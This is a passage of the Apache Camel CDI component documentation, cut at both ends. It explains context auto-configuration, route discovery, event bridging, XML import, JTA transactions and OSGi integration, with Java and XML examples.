as CDI events\nand provides a CDI events endpoint that can be used to consume \/ produce\nCDI events from \/ to Camel routes.\n\nNOTE: While the Camel CDI component is available as of **Camel 2.10**, it's\nbeen rewritten in *Camel 2.17* to better fit into the CDI programming\nmodel. Hence some of the features, like the Camel events to CDI events\nbridge and the CDI events endpoint, only apply starting with Camel 2.17.\n\nNOTE: More details on how to test Camel CDI applications are available in\nlink:cdi-testing.html[Camel CDI testing].\n\n### Auto-configured Camel context\n\nCamel CDI automatically deploys and configures a `CamelContext` bean.\nThat `CamelContext` bean is automatically instantiated, configured and\nstarted (resp. stopped) when the CDI container initializes (resp. shuts\ndown). It can be injected in the application, e.g.:\n\n[source,java]\n----\n@Inject\nCamelContext context;\n----\n\nThat default `CamelContext` bean is qualified with the\nbuilt-in `@Default` qualifier, is scoped `@ApplicationScoped` and is of\ntype `DefaultCamelContext`.\n\nNote that this bean can be customized programmatically and other Camel\ncontext beans can be deployed in the application as well.\n\n### Auto-detecting Camel routes\n\nCamel CDI automatically collects all the `RoutesBuilder` beans in the\napplication, instantiates them and adds them to the `CamelContext` bean\ninstance when the CDI container initializes. For example, adding a Camel\nroute is as simple as declaring a class, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nNote that you can declare as many `RoutesBuilder` beans as you want.\nBesides, `RouteContainer` beans are also automatically collected,\ninstantiated and added to the `CamelContext` bean instance managed by\nCamel CDI when the container initializes.\n\n*Available as of Camel 2.19*\n\nIn some situations, it may be necessary to disable the auto-configuration of the `RouteBuilder` and `RouteContainer` beans. That can be achieved by observing the `CdiCamelConfiguration` event, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoConfigureRoutes(false);\n}\n----\n\nSimilarly, it is possible to deactivate the automatic starting of the configured `CamelContext` beans, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoStartContexts(false);\n}\n----\n\n### Auto-configured Camel primitives\n\nCamel CDI provides beans for common Camel primitives that can be\ninjected in any CDI bean, e.g.:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. 
mock:outbound\n\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n\n@Inject\nTypeConverter converter;\n----\n\n### Camel context configuration\n\nIf you just want to change the name of the default `CamelContext` bean,\nyou can use the `@ContextName` qualifier provided by Camel CDI, e.g.:\n\n[source,java]\n----\n@ContextName(\"camel-context\")\nclass MyRouteBean extends RouteBuilder {\n\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nOtherwise, if more customization is needed, any `CamelContext` class can be\nused to declare a custom Camel context bean. Then,\nthe `@PostConstruct` and `@PreDestroy` lifecycle callbacks can be used\nto perform the customization, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass CustomCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void customize() {\n \/\/ Set the Camel context name\n setName(\"custom\");\n \/\/ Disable JMX\n disableJMX();\n }\n\n @PreDestroy\n void cleanUp() {\n \/\/ ...\n }\n}\n----\n\nlink:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_method[Producer]\nand link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#disposer_method[disposer]\nmethods can also be used to customize the Camel context bean, e.g.:\n\n[source,java]\n----\nclass CamelContextFactory {\n\n @Produces\n @ApplicationScoped\n CamelContext customize() {\n DefaultCamelContext context = new DefaultCamelContext();\n context.setName(\"custom\");\n return context;\n }\n\n void cleanUp(@Disposes CamelContext context) {\n \/\/ ...\n }\n}\n----\n\nSimilarly, link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_field[producer\nfields] can be used, e.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\nCamelContext context = new CustomCamelContext();\n\nclass CustomCamelContext extends DefaultCamelContext {\n\n CustomCamelContext() {\n setName(\"custom\");\n }\n}\n----\n\nThis pattern can be used, for example, to avoid having the Camel context\nroutes started automatically when the container initializes, by calling\nthe `setAutoStartup` method, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass ManualStartupCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void manual() {\n setAutoStartup(false);\n }\n}\n----\n\n### Multiple Camel contexts\n\nAny number of `CamelContext` beans can actually be declared in the\napplication as documented above. In that case, the CDI qualifiers\ndeclared on these `CamelContext` beans are used to bind the Camel routes\nand other Camel primitives to the corresponding Camel contexts. 
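Such a user-defined qualifier (like the `@BarContextQualifier` used below) is a plain CDI qualifier annotation. A minimal sketch, assuming nothing more than the standard `javax.inject.Qualifier` meta-annotation:\n\n[source,java]\n----\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\nimport java.lang.annotation.RetentionPolicy;\nimport java.lang.annotation.Target;\nimport javax.inject.Qualifier;\n\n\/\/ A plain CDI qualifier; CDI discovers it by the @Qualifier meta-annotation\n@Qualifier\n@Retention(RetentionPolicy.RUNTIME)\n@Target({ElementType.TYPE, ElementType.METHOD, ElementType.PARAMETER, ElementType.FIELD})\npublic @interface BarContextQualifier {\n}\n----\n\n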
For\nexample, if the following beans get declared:\n\n[source,java]\n----\n@ApplicationScoped\n@ContextName(\"foo\")\nclass FooCamelContext extends DefaultCamelContext {\n}\n\n@ApplicationScoped\n@BarContextQualifier\nclass BarCamelContext extends DefaultCamelContext {\n}\n\n@ContextName(\"foo\")\nclass RouteAddedToFooCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\n@BarContextQualifier\nclass RouteAddedToBarCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\n@ContextName(\"baz\")\nclass RouteAddedToBazCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\n@MyOtherQualifier\nclass RouteNotAddedToAnyCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n----\n\nThe `RoutesBuilder` beans qualified with `@ContextName` are\nautomatically added to the corresponding `CamelContext` beans by Camel\nCDI. If no such `CamelContext` bean exists, it gets automatically\ncreated, as for the `RouteAddedToBazCamelContext` bean. Note this only\nhappens for the `@ContextName` qualifier provided by Camel CDI. Hence\nthe `RouteNotAddedToAnyCamelContext` bean qualified with the\nuser-defined `@MyOtherQualifier` qualifier does not get added to any\nCamel context. That may be useful, for example, for Camel routes that\nneed to be added later during the application execution.\n\nNOTE: Since Camel version 2.17.0, Camel CDI is capable of managing any kind of\n`CamelContext` bean (e.g. `DefaultCamelContext`). In previous versions,\nit was only capable of managing beans of type `CdiCamelContext`, so custom\ncontext beans had to extend it.\n\nThe CDI qualifiers declared on the `CamelContext` beans are also used to\nbind the corresponding Camel primitives, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\n@BarContextQualifier\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. 
mock:outbound\n\n@Inject\n@ContextName(\"baz\")\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n### Configuration properties\n\nTo configure the sourcing of the configuration properties used by Camel\nto resolve properties placeholders, you can declare\na\u00a0`PropertiesComponent`\u00a0bean qualified with `@Named(\"properties\")`,\ne.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent propertiesComponent() {\n Properties properties = new Properties();\n properties.put(\"property\", \"value\");\n PropertiesComponent component = new PropertiesComponent();\n component.setInitialProperties(properties);\n component.setLocation(\"classpath:placeholder.properties\");\n return component;\n}\n----\n\nIf you want to\nuse\u00a0link:http:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]\u00a0you can declare the\nfollowing\u00a0`PropertiesComponent` bean:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent properties(PropertiesParser parser) {\n PropertiesComponent component = new PropertiesComponent();\n component.setPropertiesParser(parser);\n return component;\n}\n\n\/\/ PropertiesParser bean that uses DeltaSpike to resolve properties\nstatic class DeltaSpikeParser extends DefaultPropertiesParser {\n @Override\n public String parseProperty(String key, String value, Properties properties) {\n return ConfigResolver.getPropertyValue(key);\n }\n}\n----\n\nYou can see the\u00a0`camel-example-cdi-properties` example for a working\nexample of a Camel CDI application using DeltaSpike configuration\nmechanism.\n\n### Auto-configured type converters\n\nCDI beans annotated with the\u00a0`@Converter`\u00a0annotation are automatically\nregistered into the deployed Camel contexts, e.g.:\n\n[source,java]\n----\n@Converter\npublic class MyTypeConverter {\n\n @Converter\n public Output convert(Input input) {\n \/\/...\n }\n}\n----\n\nNote that CDI injection is supported within the type converters.\n\n### Camel bean integration\n\n#### Camel annotations\n\nAs part of the Camel\u00a0link:http:\/\/camel.apache.org\/bean-integration.html[bean\nintegration],\u00a0Camel comes with a set\nof\u00a0link:http:\/\/camel.apache.org\/bean-integration.html#BeanIntegration-Annotations[annotations]\u00a0that\nare seamlessly supported by Camel CDI. 
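In practice, a single CDI bean can freely mix both annotation sets. A minimal sketch (the bean and endpoint names are made up for illustration):\n\n[source,java]\n----\nimport javax.inject.Inject;\nimport javax.inject.Named;\nimport org.apache.camel.Consume;\nimport org.apache.camel.ProducerTemplate;\nimport org.apache.camel.cdi.Uri;\n\n@Named(\"invoiceHandler\")\nclass InvoiceHandler {\n\n \/\/ CDI injection of a Camel primitive, qualified with @Uri\n @Inject\n @Uri(\"direct:audit\")\n ProducerTemplate audit;\n\n \/\/ Camel bean integration: this method consumes from the endpoint\n @Consume(uri = \"seda:invoices\")\n void onInvoice(String body) {\n audit.sendBody(body);\n }\n}\n----\n\n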
So you can use any of these\nannotations in your CDI beans, e.g.:\n\n[width=\"100%\",cols=\"1,2a,2a\",options=\"header\",]\n|=======================================================================\n| |Camel annotation |CDI equivalent\n|Configuration property a|\n[source,java]\n----\n@PropertyInject(\"key\")\nString value;\n----\n\n a|\nIf using the\nhttp:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]:\n\n[source,java]\n----\n@Inject\n@ConfigProperty(name = \"key\")\nString value;\n----\n\nSee link:cdi.html[configuration properties] for more details.\n\n|Producer template injection (default Camel context) a|\n[source,java]\n----\n@Produce(uri = \"mock:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"mock:outbound\")\nFluentProducerTemplate producer;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"mock:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Inject\n@Uri(\"mock:outbound\")\nFluentProducerTemplate producer;\n----\n\n|Endpoint injection (default Camel context) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\")\nEndpoint endpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n|Endpoint injection (Camel context by name) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\",\n context = \"foo\")\nEndpoint contextEndpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nEndpoint contextEndpoint;\n----\n\n|Bean injection (by type) a|\n[source,java]\n----\n@BeanInject\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\nMyBean bean;\n----\n\n|Bean injection (by name) a|\n[source,java]\n----\n@BeanInject(\"foo\")\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Named(\"foo\")\nMyBean bean;\n----\n\n|POJO consuming a|\n[source,java]\n----\n@Consume(uri = \"seda:inbound\")\nvoid consume(@Body String body) {\n \/\/...\n}\n----\n\n | \n|=======================================================================\n\n#### Bean component\n\nYou can refer to CDI beans, either by type or name, from the Camel DSL,\ne.g. 
with the Java Camel DSL:\n\n[source,java]\n----\nclass MyBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(MyBean.class);\n----\n\nOr to look up a CDI bean by name from the Java DSL:\n\n[source,java]\n----\n@Named(\"foo\")\nclass MyNamedBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(\"foo\");\n----\n\n#### Referring beans from Endpoint URIs\n\nWhen configuring endpoints using the URI syntax you can refer to beans\nin the link:registry.html[Registry] using the `#` notation. If the URI\nparameter value starts with a `#` sign then Camel CDI will look up a\nbean of the given type by name, e.g.:\n\n[source,java]\n----\nfrom(\"jms:queue:{{destination}}?transacted=true&transactionManager=#jtaTransactionManager\").to(\"...\");\n----\n\nHaving the following CDI bean qualified\nwith `@Named(\"jtaTransactionManager\")`:\n\n[source,java]\n----\n@Produces\n@Named(\"jtaTransactionManager\")\nPlatformTransactionManager createTransactionManager(TransactionManager transactionManager, UserTransaction userTransaction) {\n JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();\n jtaTransactionManager.setUserTransaction(userTransaction);\n jtaTransactionManager.setTransactionManager(transactionManager);\n jtaTransactionManager.afterPropertiesSet();\n return jtaTransactionManager;\n}\n----\n\n### Camel events to CDI events\n\n*Available as of Camel 2.17*\n\nCamel provides a set\nof link:http:\/\/camel.apache.org\/maven\/current\/camel-core\/apidocs\/org\/apache\/camel\/management\/event\/package-summary.html[management\nevents] that can be subscribed to for listening to Camel context,\nservice, route and exchange events. Camel CDI seamlessly translates\nthese Camel events into CDI events that can be observed using\nCDI link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethods], e.g.:\n\n[source,java]\n----\nvoid onContextStarting(@Observes CamelContextStartingEvent event) {\n \/\/ Called before the default Camel context is about to start\n}\n----\n\nAs of Camel 2.18, it is possible to observe events for a particular route (`RouteAddedEvent`,\n`RouteStartedEvent`, `RouteStoppedEvent` and `RouteRemovedEvent`), provided it has\nan explicitly defined route id, e.g.:\n\n[source,java]\n----\nfrom(\"...\").routeId(\"foo\").to(\"...\");\n\nvoid onRouteStarted(@Observes @Named(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route \"foo\" has started\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like `@ContextName`, can be used to refine the\nobserver method resolution to a particular Camel context as specified\nin link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], e.g.:\n\n[source,java]\n----\nvoid onRouteStarted(@Observes @ContextName(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route 'event.getRoute()' for the Camel context 'foo' has started\n}\n\nvoid onContextStarted(@Observes @Manual CamelContextStartedEvent event) {\n \/\/ Called after the Camel context qualified with '@Manual' has started\n}\n----\n\nSimilarly, the `@Default` qualifier can be used to observe Camel events\nfor the _default_ Camel context if multiple contexts exist, e.g.:\n\n[source,java]\n----\nvoid onExchangeCompleted(@Observes @Default ExchangeCompletedEvent event) {\n \/\/ Called after the exchange 'event.getExchange()' processing has completed\n}\n----\n\nIn 
that example, if no qualifier is specified, the\u00a0`@Any`\u00a0qualifier is\nimplicitly assumed, so that corresponding events for all the Camel\ncontexts get received.\n\nNote that the support for Camel events translation into CDI events is\nonly activated if observer methods listening for Camel events are\ndetected in the deployment, and that per Camel context.\n\n### CDI events endpoint\n\n*Available as of Camel 2.17*\n\nThe CDI event endpoint bridges\nthe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#events[CDI\nevents]\u00a0with the Camel routes so that CDI events can be seamlessly\nobserved \/ consumed (resp. produced \/ fired) from Camel consumers (resp.\nby Camel producers).\n\nThe\u00a0`CdiEventEndpoint<T>`\u00a0bean provided by Camel CDI can be used to\nobserve \/ consume CDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(cdiEventEndpoint).log(\"CDI event received: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:event\")\nProducerTemplate producer;\n\nvoid observeCdiEvents(@Observes String event) {\n producer.sendBody(event);\n}\n\nfrom(\"direct:event\").log(\"CDI event received: ${body}\");\n----\n\nConversely, the\u00a0`CdiEventEndpoint<T>`\u00a0bean can be used to produce \/ fire\nCDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint).log(\"CDI event sent: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\").process(new Processor() {\n @Override\n public void process(Exchange exchange) {\n event.fire(exchange.getBody(String.class));\n }\n}).log(\"CDI event sent: ${body}\");\n----\n\nOr using a Java 8 lambda expression:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\")\n .process(exchange -> event.fire(exchange.getIn().getBody(String.class)))\n .log(\"CDI event sent: ${body}\");\n----\n\nThe type variable\u00a0`T` (resp. the qualifiers) of a\nparticular\u00a0`CdiEventEndpoint<T>`\u00a0injection point are automatically\ntranslated into the parameterized\u00a0_event type_\u00a0(resp. 
into the\u00a0_event\nqualifiers_)\u00a0e.g.:\n\n[source,java]\n----\n@Inject\n@FooQualifier\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @FooQualifier List<String> event) {\n logger.info(\"CDI event: {}\", event);\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to qualify\nthe\u00a0`CdiEventEndpoint<T>`\u00a0injection points, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\/\/ Only observes \/ consumes events having the @ContextName(\"foo\") qualifier\nfrom(cdiEventEndpoint).log(\"Camel context (foo) > CDI event received: ${body}\");\n\/\/ Produces \/ fires events with the @ContextName(\"foo\") qualifier\nfrom(\"...\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @ContextName(\"foo\") List<String> event) {\n logger.info(\"Camel context (foo) > CDI event: {}\", event);\n}\n----\n\nNote that the CDI event Camel endpoint dynamically adds\nan\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethod]\u00a0for each unique combination of\u00a0_event type_\u00a0and\u00a0_event\nqualifiers_\u00a0and solely relies on the container\ntypesafe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], which leads to an implementation as efficient as possible.\n\nBesides, as the impedance between the\u00a0_typesafe_\u00a0nature of CDI and\nthe\u00a0_dynamic_\u00a0nature of\nthe\u00a0link:http:\/\/camel.apache.org\/component.html[Camel component]\u00a0model is\nquite high, it is not possible to create an instance of the CDI event\nCamel endpoint via\u00a0link:http:\/\/camel.apache.org\/uris.html[URIs]. Indeed, the\nURI format for the CDI event component is:\n\n[source,text]\n----\ncdi-event:\/\/PayloadType<T1,...,Tn>[?qualifiers=QualifierType1[,...[,QualifierTypeN]...]]\n----\n\nWith the authority\u00a0`PayloadType`\u00a0(resp. the\u00a0`QualifierType`) being the\nURI escaped fully qualified name of the payload (resp. qualifier) raw\ntype followed by the type parameters section delimited by angle brackets\nfor payload parameterized type. 
Which leads to _unfriendly_ URIs,\ne.g.:\n\n[source,text]\n----\ncdi-event:\/\/org.apache.camel.cdi.example.EventPayload%3Cjava.lang.Integer%3E?qualifiers=org.apache.camel.cdi.example.FooQualifier%2Corg.apache.camel.cdi.example.BarQualifier\n----\n\nBut more fundamentally, that would prevent efficient binding between the\nendpoint instances and the observer methods as the CDI container doesn't\nhave any way of discovering the Camel context model during the\ndeployment phase.\n\n### Camel XML configuration import\n\n*Available as of Camel 2.18*\n\nWhile CDI favors a typesafe dependency injection mechanism, it may be\nuseful to reuse existing Camel XML configuration files in a Camel CDI\napplication. In other use cases, it might be handy to rely on the Camel\nXML DSL to configure the application's Camel context(s).\n\nYou can use the `@ImportResource` annotation that's provided by Camel\nCDI on any CDI bean and Camel CDI will automatically load the Camel XML\nconfiguration at the specified locations, e.g.:\n\n[source,java]\n----\n@ImportResource(\"camel-context.xml\")\nclass MyBean {\n}\n----\n\nCamel CDI will load the resources at the specified locations from the\nclasspath (other protocols may be added in the future).\n\nEvery `CamelContext` element and the other Camel _primitives_ from the\nimported resources are automatically deployed as CDI beans during the\ncontainer bootstrap so that they benefit from the auto-configuration\nprovided by Camel CDI and become available for injection at runtime. If\nsuch an element has an explicit `id` attribute set, the corresponding\nCDI bean is qualified with the `@Named` qualifier, e.g., given the\nfollowing Camel XML configuration:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <endpoint id=\"bar\" uri=\"seda:inbound\">\n <property key=\"queue\" value=\"#queue\"\/>\n <property key=\"concurrentConsumers\" value=\"10\"\/>\n <\/endpoint>\n<\/camelContext>\n----\n\nThe corresponding CDI beans are automatically deployed and can be\ninjected, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCamelContext context;\n\n@Inject\n@Named(\"bar\")\nEndpoint endpoint;\n----\n\nNote that the `CamelContext` beans are automatically qualified with both\nthe `@Named` and `@ContextName` qualifiers. 
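Since the context declared above has the `id` \"foo\", it can therefore be looked up by either qualifier. A small sketch of the two equivalent injection points:\n\n[source,java]\n----\n@Inject\n@Named(\"foo\")\nCamelContext byName;\n\n@Inject\n@ContextName(\"foo\")\nCamelContext byContextName; \/\/ resolves to the same bean as above\n----\n\n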
If the\nimported `CamelContext` element doesn't have an `id` attribute, the\ncorresponding bean is deployed with the built-in `@Default` qualifier.\n\nConversely, CDI beans deployed in the application can be referred to\nfrom the Camel XML configuration, usually using the `ref` attribute,\ne.g., given the following bean declaration:\n\n[source,java]\n----\n@Produces\n@Named(\"baz\")\nProcessor processor = exchange -> exchange.getIn().setHeader(\"qux\", \"quux\");\n----\n\nA reference to that bean can be declared in the imported Camel XML\nconfiguration, e.g.:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <route>\n <from uri=\"...\"\/>\n <process ref=\"baz\"\/>\n <\/route>\n<\/camelContext>\n----\n\n\n### Transaction support\n\n*Available as of Camel 2.19*\n\nCamel CDI provides support for the Camel transactional client using JTA.\n\nThat support is optional, hence you need to have JTA in your application classpath, e.g., by explicitly adding JTA as a dependency when using Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>javax.transaction<\/groupId>\n <artifactId>javax.transaction-api<\/artifactId>\n <scope>runtime<\/scope>\n<\/dependency>\n----\n\nYou'll also have to deploy your application in a JTA-capable container or provide a standalone JTA implementation.\n\n[CAUTION]\n====\nNote that, for the time being, the transaction manager is looked up as a JNDI resource with the `java:\/TransactionManager` key.\n\nMore flexible strategies will be added in the future to support a wider range of deployment scenarios.\n====\n\n#### Transaction policies\n\nCamel CDI provides the typically supported Camel `TransactedPolicy` implementations as CDI beans. It is possible to have these policies looked up by name using the transacted EIP, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .transacted(\"PROPAGATION_REQUIRED\")\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThis would be equivalent to:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Inject\n @Named(\"PROPAGATION_REQUIRED\")\n Policy required;\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .policy(required)\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThe list of supported transaction policy names is:\n\n- `PROPAGATION_NEVER`,\n- `PROPAGATION_NOT_SUPPORTED`,\n- `PROPAGATION_SUPPORTS`,\n- `PROPAGATION_REQUIRED`,\n- `PROPAGATION_REQUIRES_NEW`,\n- `PROPAGATION_NESTED`,\n- `PROPAGATION_MANDATORY`.\n\n#### Transactional error handler\n\nCamel CDI provides a transactional error handler that extends the redelivery error handler, forces a rollback whenever an exception occurs and creates a new transaction for each redelivery.\n\nCamel CDI provides the `CdiRouteBuilder` class that exposes the `transactionErrorHandler` helper method to enable quick access to the configuration, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends CdiRouteBuilder {\n\n @Override\n public void configure() {\n errorHandler(transactionErrorHandler()\n .setTransactionPolicy(\"PROPAGATION_SUPPORTS\")\n .maximumRedeliveries(5)\n .maximumRedeliveryDelay(5000)\n .collisionAvoidancePercent(10)\n .backOffMultiplier(1.5));\n }\n}\n----\n\n\n### Auto-configured OSGi integration\n\n*Available as of Camel 2.17*\n\nThe Camel context beans are automatically 
adapted by Camel CDI so that\nthey are registered as OSGi services and the various resolvers\n(like `ComponentResolver` and `DataFormatResolver`) integrate with the\nOSGi registry. That means that the link:karaf.html[Karaf Camel commands]\ncan be used to operate the Camel contexts auto-configured by Camel CDI,\ne.g.:\n\n[source,text]\n----\nkaraf@root()> camel:context-list\n Context Status Total # Failed # Inflight # Uptime\n ------- ------ ------- -------- ---------- ------\n camel-cdi Started 1 0 0 1 minute\n----\n\nSee the `camel-example-cdi-osgi` example for a working example of the\nCamel CDI OSGi integration.\n\n\n### Lazy Injection \/ Programmatic Lookup\n\nWhile the CDI programming model favors a http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#typesafe_resolution[typesafe resolution]\nmechanism that occurs at application initialization time, it is possible to perform\ndynamic \/ lazy injection later during the application execution using the\nhttp:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#programmatic_lookup[programmatic lookup]\nmechanism.\n\nFor convenience, Camel CDI provides the annotation literals corresponding to the\nCDI qualifiers that you can use for standard injection of Camel primitives.\nThese annotation literals can be used in conjunction with the `javax.enterprise.inject.Instance`\ninterface, which is the CDI entry point to perform lazy injection \/ programmatic lookup.\n\nFor example, you can use the provided annotation literal for the `@Uri` qualifier\nto lazily look up Camel primitives, e.g. for `ProducerTemplate` beans:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<ProducerTemplate> producers;\n\nProducerTemplate inbound = producers\n .select(Uri.Literal.of(\"direct:inbound\"))\n .get();\n----\n\nOr for `Endpoint` beans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<Endpoint> endpoints;\n\nMockEndpoint outbound = endpoints\n .select(MockEndpoint.class, Uri.Literal.of(\"mock:outbound\"))\n .get();\n----\n\nSimilarly, you can use the provided annotation literal for\nthe `@ContextName` qualifier to lazily look up `CamelContext`\nbeans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nCamelContext context = contexts\n .select(ContextName.Literal.of(\"foo\"))\n .get();\n----\n\nYou can also refine the selection based on the Camel context type, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\n\/\/ Refine the selection by type\nInstance<DefaultCamelContext> context = contexts.select(DefaultCamelContext.class);\n\n\/\/ Check if such a bean exists, then retrieve a reference\nif (!context.isUnsatisfied())\n context.get();\n----\n\nOr even iterate over a selection of Camel contexts, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nfor (CamelContext context : contexts)\n context.setUseBreadcrumb(true);\n----\n\n\n### Maven Archetype\n\nAmong the available link:camel-maven-archetypes.html[Camel Maven\narchetypes], you can use the provided `camel-archetype-cdi` to generate\na Camel CDI Maven project, e.g.:\n\n[source,bash]\n----\nmvn archetype:generate -DarchetypeGroupId=org.apache.camel.archetypes -DarchetypeArtifactId=camel-archetype-cdi\n----\n\n### Supported containers\n\nThe Camel CDI component is compatible with any CDI 1.0, CDI 1.1 and CDI\n1.2 compliant runtime. 
It's been successfully tested against the\nfollowing runtimes:\n\n[width=\"100%\",cols=\"2,1m,2\",options=\"header\",]\n|============================================\n|Container |Version |Runtime\n|Weld SE |1.1.28.Final |CDI 1.0 \/ Java SE 7\n|OpenWebBeans |1.2.7 |CDI 1.0 \/ Java SE 7\n|Weld SE |2.3.4.Final |CDI 1.2 \/ Java SE 7\n|OpenWebBeans |1.6.3 |CDI 1.2 \/ Java SE 7\n|WildFly |8.2.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |9.0.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |10.0.0.Final |CDI 1.2 \/ Java EE 7\n|Karaf |2.4.4 |CDI 1.2 \/ OSGi 4 \/ PAX CDI\n|Karaf |3.0.5 |CDI 1.2 \/ OSGi 5 \/ PAX CDI\n|Karaf |4.0.4 |CDI 1.2 \/ OSGi 6 \/ PAX CDI\n|============================================\n\n\n### Examples\n\nThe following examples are available in the `examples` directory of the\nCamel project:\n\n[width=\"100%\",cols=\"1m,3\",options=\"header\",]\n|============================================\n|Example |Description\n\n|camel-example-cdi\n|Illustrates how to work with Camel using CDI to configure components,\nendpoints and beans\n\n|camel-example-cdi-kubernetes\n|Illustrates the integration between Camel, CDI and 